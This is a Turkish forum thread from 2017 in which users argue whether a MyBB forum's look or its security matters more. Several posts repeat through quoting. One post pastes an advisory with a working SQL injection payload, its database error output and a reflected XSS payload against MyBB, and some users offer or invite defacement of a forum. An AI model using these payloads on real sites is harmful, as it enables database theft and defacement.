(06-04-2017 Saat: 19:20)S9zerus Nickli Kullanıcıdan Alıntı: Tamam sistemsel olarak iyide görünüş olarak önemli :D
görünüş olarak mı önemli? senin kafandamı var dostum? görünüş olarak önemli nedir ya? sistem çalışmaz ise veya güvenlik açığı olursa görünüşün hiçbir manası kalmıyorki? sen o görünüşü yapabilmen için sistemin düzgün çalışması gerekir adamlarda sistemi düzgün yapmaya çalıştıkları için güncelliyorlar.
(06-04-2017 Saat: 19:20)S9zerus Nickli Kullanıcıdan Alıntı: Tamam sistemsel olarak iyide görünüş olarak önemli :D
görünüş olarak mı önemli? senin kafandamı var dostum? görünüş olarak önemli nedir ya? sistem çalışmaz ise veya güvenlik açığı olursa görünüşün hiçbir manası kalmıyorki? sen o görünüşü yapabilmen için sistemin düzgün çalışması gerekir adamlarda sistemi düzgün yapmaya çalıştıkları için güncelliyorlar.
BENİM İÇİN GÖRÜNÜŞ ÖNEMLİ SİSTEM 1.6 SÜRÜMÜ BİLE OLSA UMRUMDA DEĞİL FORUMUN ŞEKLİ ŞEMALI GÜZEL OLSUN DİKKAT ÇEKSİN SİSTEMİDE SONRAYA BIRAK
CEVABIMI BIRAKIYORUM ; "BENİM İÇİN SİSTEM ÖNEMLİ FAKAT GÖRÜNÜŞ DAHA ÖNEMLİ."
(06-04-2017 Saat: 19:20)S9zerus Nickli Kullanıcıdan Alıntı: Tamam sistemsel olarak iyide görünüş olarak önemli :D
görünüş olarak mı önemli? senin kafandamı var dostum? görünüş olarak önemli nedir ya? sistem çalışmaz ise veya güvenlik açığı olursa görünüşün hiçbir manası kalmıyorki? sen o görünüşü yapabilmen için sistemin düzgün çalışması gerekir adamlarda sistemi düzgün yapmaya çalıştıkları için güncelliyorlar.
BENİM İÇİN GÖRÜNÜŞ ÖNEMLİ SİSTEM 1.6 SÜRÜMÜ BİLE OLSA UMRUMDA DEĞİL FORUMUN ŞEKLİ ŞEMALI GÜZEL OLSUN DİKKAT ÇEKSİN SİSTEMİDE SONRAYA BIRAK
CEVABIMI BIRAKIYORUM ; "BENİM İÇİN SİSTEM ÖNEMLİ FAKAT GÖRÜNÜŞ DAHA ÖNEMLİ."
tamam senin için olabilir fakat şunu söylüyorum sen bir forum aç en güzel temayı yükle gözüne hoş gelen sistem olarak hiç bir dokunuş yapma MyBB 1.8 olarak ve forumu bana at bende index basıyım? senin için söylüyorum güvenlik olmazsa sitenin hiç bir anlamıda kalmıyor.
(06-04-2017 Saat: 19:20)S9zerus Nickli Kullanıcıdan Alıntı: Tamam sistemsel olarak iyide görünüş olarak önemli :D
görünüş olarak mı önemli? senin kafandamı var dostum? görünüş olarak önemli nedir ya? sistem çalışmaz ise veya güvenlik açığı olursa görünüşün hiçbir manası kalmıyorki? sen o görünüşü yapabilmen için sistemin düzgün çalışması gerekir adamlarda sistemi düzgün yapmaya çalıştıkları için güncelliyorlar.
BENİM İÇİN GÖRÜNÜŞ ÖNEMLİ SİSTEM 1.6 SÜRÜMÜ BİLE OLSA UMRUMDA DEĞİL FORUMUN ŞEKLİ ŞEMALI GÜZEL OLSUN DİKKAT ÇEKSİN SİSTEMİDE SONRAYA BIRAK
CEVABIMI BIRAKIYORUM ; "BENİM İÇİN SİSTEM ÖNEMLİ FAKAT GÖRÜNÜŞ DAHA ÖNEMLİ."
tamam senin için olabilir fakat şunu söylüyorum sen bir forum aç en güzel temayı yükle gözüne hoş gelen sistem olarak hiç bir dokunuş yapma MyBB 1.8 olarak ve forumu bana at bende index basıyım? senin için söylüyorum güvenlik olmazsa sitenin hiç bir anlamıda kalmıyor.
1. sistem olarak elbetki güvenliğimi alıyorum.
2. index basılsada siteye caq2 girse bile umrumda olmuyor :) takmıyorum ( rahat insanım.. )
3.ben dedim sistem önemli fakat görünüş daha önemli.. sistemede önem veriyorum yani.
1.4 efsanedir :D
x.y.z tarzı sürümlerde z artar ise görünüm ya da büyük bir değişiklik olmaz, genellikle buglar kapatılır ve birkaç sistemsel sorun giderilir.
(06-04-2017 Saat: 19:20)S9zerus Nickli Kullanıcıdan Alıntı: Tamam sistemsel olarak iyide görünüş olarak önemli :D
görünüş olarak mı önemli? senin kafandamı var dostum? görünüş olarak önemli nedir ya? sistem çalışmaz ise veya güvenlik açığı olursa görünüşün hiçbir manası kalmıyorki? sen o görünüşü yapabilmen için sistemin düzgün çalışması gerekir adamlarda sistemi düzgün yapmaya çalıştıkları için güncelliyorlar.
Diğer cevaplara bakmadan yazıyorum. Zaten iyi diyor sistemsel olarak adam, sen niye karşı koydun anlamadım? Ve görünüş gerçekten çok önemli. Aynı zamanda fonksiyonellik de öyle. Güvenlik her zaman yapılır onda herhangi bir sıkıntı yok. Sen hiç MyBB ile ilgili güvenlik sıkıntısı yaşayan adam gördün mü? Burada hep mybb ile ilgili görünüş ve fonksiyonellik tartışılıyor.
Murat sen de maşallah sanki 2.0 çıkmış gibi haber, yanlış duymadın falan.
(06-04-2017 Saat: 19:20)S9zerus Nickli Kullanıcıdan Alıntı: Tamam sistemsel olarak iyide görünüş olarak önemli :D
görünüş olarak mı önemli? senin kafandamı var dostum? görünüş olarak önemli nedir ya? sistem çalışmaz ise veya güvenlik açığı olursa görünüşün hiçbir manası kalmıyorki? sen o görünüşü yapabilmen için sistemin düzgün çalışması gerekir adamlarda sistemi düzgün yapmaya çalıştıkları için güncelliyorlar.
Diğer cevaplara bakmadan yazıyorum. Zaten iyi diyor sistemsel olarak adam, sen niye karşı koydun anlamadım? Ve görünüş gerçekten çok önemli. Aynı zamanda fonksiyonellik de öyle. Güvenlik her zaman yapılır onda herhangi bir sıkıntı yok. Sen hiç MyBB ile ilgili güvenlik sıkıntısı yaşayan adam gördün mü? Burada hep mybb ile ilgili görünüş ve fonksiyonellik tartışılıyor.
Murat sen de maşallah sanki 2.0 çıkmış gibi haber, yanlış duymadın falan.
Mert seni çok önceden tanırım. görünüş olarak önemli demiş bende yorumumu yaptım. 'sen hiç mybb ile güvenlik sıkıntısı yaşayan bir adam gördünmü?' sorusunada şöyle cevap vereyim: sen bir forum kur hiç bir güvenlik yapma sistem güvenliği ve forum güvenliği tasarımını yap geç temanı kodla geç forumu bir insana attığın zaman büyük ihtimalle sunucunda bir açık bulup sitene indexi basar zone kayıtlarını alır ve takmadan yoluna devam eder? görünüş önemliyse güvenlik onun 2 katı daha önemlidir ben bunu savunuyorum. sen güvenliksiz forum aç ben indeximi basayım ozaman güvenliğin nasıl olduğunu anlarsın hosting filan lazım olursa sağlarım.
(06-04-2017 Saat: 19:20)S9zerus Nickli Kullanıcıdan Alıntı: Tamam sistemsel olarak iyide görünüş olarak önemli :D
görünüş olarak mı önemli? senin kafandamı var dostum? görünüş olarak önemli nedir ya? sistem çalışmaz ise veya güvenlik açığı olursa görünüşün hiçbir manası kalmıyorki? sen o görünüşü yapabilmen için sistemin düzgün çalışması gerekir adamlarda sistemi düzgün yapmaya çalıştıkları için güncelliyorlar.
Diğer cevaplara bakmadan yazıyorum. Zaten iyi diyor sistemsel olarak adam, sen niye karşı koydun anlamadım? Ve görünüş gerçekten çok önemli. Aynı zamanda fonksiyonellik de öyle. Güvenlik her zaman yapılır onda herhangi bir sıkıntı yok. Sen hiç MyBB ile ilgili güvenlik sıkıntısı yaşayan adam gördün mü? Burada hep mybb ile ilgili görünüş ve fonksiyonellik tartışılıyor.
Murat sen de maşallah sanki 2.0 çıkmış gibi haber, yanlış duymadın falan.
Mert seni çok önceden tanırım. görünüş olarak önemli demiş bende yorumumu yaptım. 'sen hiç mybb ile güvenlik sıkıntısı yaşayan bir adam gördünmü?' sorusunada şöyle cevap vereyim: sen bir forum kur hiç bir güvenlik yapma sistem güvenliği ve forum güvenliği tasarımını yap geç temanı kodla geç forumu bir insana attığın zaman büyük ihtimalle sunucunda bir açık bulup sitene indexi basar zone kayıtlarını alır ve takmadan yoluna devam eder? görünüş önemliyse güvenlik onun 2 katı daha önemlidir ben bunu savunuyorum. sen güvenliksiz forum aç ben indeximi basayım ozaman güvenliğin nasıl olduğunu anlarsın hosting filan lazım olursa sağlarım.
Gereksiz yere index basanlar yüzünden böyle diyorsun zaten normalde böyle bir şey olmamalı. Güvenlik daha önemli her zaman en ön planda o gelir haklısın da sen adamla bildiğin kavga edercesine yorum yapmışsın. Daha sakin olabilirdin. Benim asıl anlatmak istediğim burada mybb güvenlik falan değil. Gereksiz yere kavga çıkarma. Tamam tartışırsınız adam gibi de çok saldırganca olmuş.
(06-04-2017 Saat: 20:00)S9zerus Nickli Kullanıcıdan Alıntı: index basılmacak düzeyde bir sistem GOOGLE , YOUTUBE , FACE Gibi yerlerde yok mybb demi olacak ?
Dostum bak anlamıyorsun. 'https://www.google.com.tr/#q=mybb+vulnerability&*' linkinde MyBB'nin güncel açıklarını bulabilirsin bu sayede kolaylıkla config çekilebiliyor config çekilebilince direk olarak db'ye erişim sağlayabilirsin ve dbdeki kullanıcıları çekebilirsin dbdeki verileri çekebilirsin bu sayede değişik şeyler yapabilirsin ama bu hacking yöntemlerinden biridir sadece.
Latest MyBB forum software suffers on multiple vulnerabilities, including SQL Injection and Cross Site Scripting. Such bugs may allow attacker to perform remote sql queries against the database, and so on.
Sanitize your inputs ;)
1. SQL Injection
Vuln:
POST 'question_id' - ID'+or+1+group+by+concat_ws(0x3a,database(),floor(rand(0)*2))+having+min(0)+or+1#
#1 - Response:
HTTP/1.1 503 Service Temporarily Unavailable
Date: Thu, 13 Nov 2014 15:16:02 GMT
<div id="content">
<h2>MyBB SQL Error</h2>
<div id="error">
<p>MyBB has experienced an internal SQL error and cannot continue.</p><dl>
<dt>SQL Error:</dt>
<dd>1054 - Unknown column '9' in 'order clause'</dd>
<dt>Query:</dt>
SELECT q.*, s.sid
FROM mybb_questionsessions s
LEFT JOIN mybb_questions q ON (q.qid=s.qid)
WHERE q.active='1' AND s.sid='C3yp9eM4wWlk1krjwiyxaXwqnCH9W8Om' ORDER BY 9#'
</dd>
<div id="error">
<p>MyBB has experienced an internal SQL error and cannot continue.</p><dl>
<dt>SQL Error:</dt>
<dd>1062 - Duplicate entry 'mybb:1' for key 'group_key'</dd>
<dt>Query:</dt>
<dd>
SELECT q.*, s.sid
FROM mybb_questionsessions s
LEFT JOIN mybb_questions q ON (q.qid=s.qid)
WHERE q.active='1' AND s.sid='-C3yp9eM4wWlk1krjwiyxaXwqnCH9W8Om' or 1 group by concat_ws(0x3a,database(),floor(rand(0)*2)) having min(0) or 1#'
</dd>
</dl>
(...)
2. Cross Site Scripting
a) Reflected XSS - Report post
Vuln:
GET 'type' - XSS"><script>alert(666)</script>
yukardaki örnek olarak bir açıktır bu açığın nasıl işleneceği konusunda bilgiler veriyor ve kapatma konusundada bilgiler veriyor MyBB'nin yeni sürümü çıkarmasıda bu sebeptendir güvenlik açığını kapatmaları çok çok önemli bir konudur umarım beni anlayabilmişsinizdir iyi günler dilerim.
(06-04-2017 Saat: 20:00)S9zerus Nickli Kullanıcıdan Alıntı: index basılmacak düzeyde bir sistem GOOGLE , YOUTUBE , FACE Gibi yerlerde yok mybb demi olacak ?
Dostum bak anlamıyorsun. 'https://www.google.com.tr/#q=mybb+vulnerability&*' linkinde MyBB'nin güncel açıklarını bulabilirsin bu sayede kolaylıkla config çekilebiliyor config çekilebilince direk olarak db'ye erişim sağlayabilirsin ve dbdeki kullanıcıları çekebilirsin dbdeki verileri çekebilirsin bu sayede değişik şeyler yapabilirsin ama bu hacking yöntemlerinden biridir sadece.
Latest MyBB forum software suffers on multiple vulnerabilities, including SQL Injection and Cross Site Scripting. Such bugs may allow attacker to perform remote sql queries against the database, and so on.
Sanitize your inputs ;)
1. SQL Injection
Vuln:
POST 'question_id' - ID'+or+1+group+by+concat_ws(0x3a,database(),floor(rand(0)*2))+having+min(0)+or+1#
#1 - Response:
HTTP/1.1 503 Service Temporarily Unavailable
Date: Thu, 13 Nov 2014 15:16:02 GMT
<div id="content">
<h2>MyBB SQL Error</h2>
<div id="error">
<p>MyBB has experienced an internal SQL error and cannot continue.</p><dl>
<dt>SQL Error:</dt>
<dd>1054 - Unknown column '9' in 'order clause'</dd>
<dt>Query:</dt>
SELECT q.*, s.sid
FROM mybb_questionsessions s
LEFT JOIN mybb_questions q ON (q.qid=s.qid)
WHERE q.active='1' AND s.sid='C3yp9eM4wWlk1krjwiyxaXwqnCH9W8Om' ORDER BY 9#'
</dd>
<div id="error">
<p>MyBB has experienced an internal SQL error and cannot continue.</p><dl>
<dt>SQL Error:</dt>
<dd>1062 - Duplicate entry 'mybb:1' for key 'group_key'</dd>
<dt>Query:</dt>
<dd>
SELECT q.*, s.sid
FROM mybb_questionsessions s
LEFT JOIN mybb_questions q ON (q.qid=s.qid)
WHERE q.active='1' AND s.sid='-C3yp9eM4wWlk1krjwiyxaXwqnCH9W8Om' or 1 group by concat_ws(0x3a,database(),floor(rand(0)*2)) having min(0) or 1#'
</dd>
</dl>
(...)
2. Cross Site Scripting
a) Reflected XSS - Report post
Vuln:
GET 'type' - XSS"><script>alert(666)</script>
yukardaki örnek olarak bir açıktır bu açığın nasıl işleneceği konusunda bilgiler veriyor ve kapatma konusundada bilgiler veriyor MyBB'nin yeni sürümü çıkarmasıda bu sebeptendir güvenlik açığını kapatmaları çok çok önemli bir konudur umarım beni anlayabilmişsinizdir iyi günler dilerim.
o kadar anlıyormuş gibi gözüküyorsun , turkyazilimfrm.10tl.net , bunu bırıne at .. o açığı bulan ve siteyi ele geçiren zaten mybb nin diğer sürümlerinide ele geçircek bilgide olmalı yani 0 güvenlikle bile olsan herkes yapmaz.. 3-4 çabulcu yapıyor diye güvenlik güvenlik güvenlik demeyelim.